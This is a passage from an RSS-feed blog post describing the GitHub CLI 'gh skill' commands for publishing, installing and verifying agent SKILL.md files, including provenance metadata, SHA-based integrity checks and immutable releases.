&lt;pre class="highlight shell"&gt;&lt;code&gt;gh skill publish          &lt;span class="c"&gt;# validate against agentskills.io spec&lt;/span&gt;
gh skill publish &lt;span class="nt"&gt;--fix&lt;/span&gt;    &lt;span class="c"&gt;# auto-fix metadata issues&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The Supply Chain Part
&lt;/h2&gt;

&lt;p&gt;This is less flashy but it's the part that actually matters.&lt;/p&gt;

&lt;p&gt;Agent skills are instructions. Instructions that shape what an AI agent does inside your codebase. A silently modified skill is a real attack surface — same as a tampered npm package, just newer.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;gh skill&lt;/code&gt; handles this with a few concrete mechanisms:&lt;/p&gt;

&lt;p&gt;When you install a skill, it writes provenance metadata directly into the SKILL.md frontmatter — source repo, ref, and git tree SHA. On every &lt;code&gt;gh skill update&lt;/code&gt; call, local SHAs get compared against remote. It detects actual content changes, not just version bumps.&lt;/p&gt;
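&lt;p&gt;In practice the installed file's frontmatter ends up carrying something like this; the exact key names below are illustrative, not necessarily the keys &lt;code&gt;gh&lt;/code&gt; writes:&lt;br&gt;
&lt;/p&gt;

```yaml
---
name: documentation-writer
description: Use when asked to write or update project documentation.
# provenance recorded at install time (illustrative keys)
source: github/awesome-copilot
ref: v1.2.0
tree-sha: 9f2c41ab
---
```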

&lt;p&gt;Publishers can enable immutable releases, meaning release content can't be altered after publication — even by repo admins. If you pin to a tag from an immutable release, you're fully protected even if the repo gets compromised later.&lt;/p&gt;

&lt;p&gt;The provenance data lives inside the skill file itself, so it travels with the skill when it gets moved, copied, or reorganized.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Is a Bigger Deal Than It Looks
&lt;/h2&gt;

&lt;p&gt;The SKILL.md pattern has been spreading quietly for months. Anthropic has a reference skills repo. GitHub's &lt;code&gt;awesome-copilot&lt;/code&gt; has a growing community collection. VS Code ships skill support. Claude Code loads them automatically.&lt;/p&gt;

&lt;p&gt;What was missing was tooling. Right now, sharing a skill means sending a file. Updating a skill means remembering where you put it. There's no dependency graph, no version history, no integrity check.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;gh skill&lt;/code&gt; is the package manager layer the ecosystem needed. It's early — the spec is still young, the community repo is still small — but the primitives are solid. Git tags for versioning. SHAs for integrity. Frontmatter for portable provenance.&lt;/p&gt;

&lt;p&gt;If you maintain skills for your team or your own agent setup, the publish workflow is worth looking at now, before the ecosystem gets crowded.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gh extension upgrade &lt;span class="nt"&gt;--all&lt;/span&gt;   &lt;span class="c"&gt;# make sure you're on v2.90.0+&lt;/span&gt;
gh skill &lt;span class="nb"&gt;install &lt;/span&gt;github/awesome-copilot documentation-writer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;em&gt;Building content around MCP and agentic AI? I write about this stuff weekly.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>github</category>
      <category>python</category>
    </item>
  </channel>
</rss>
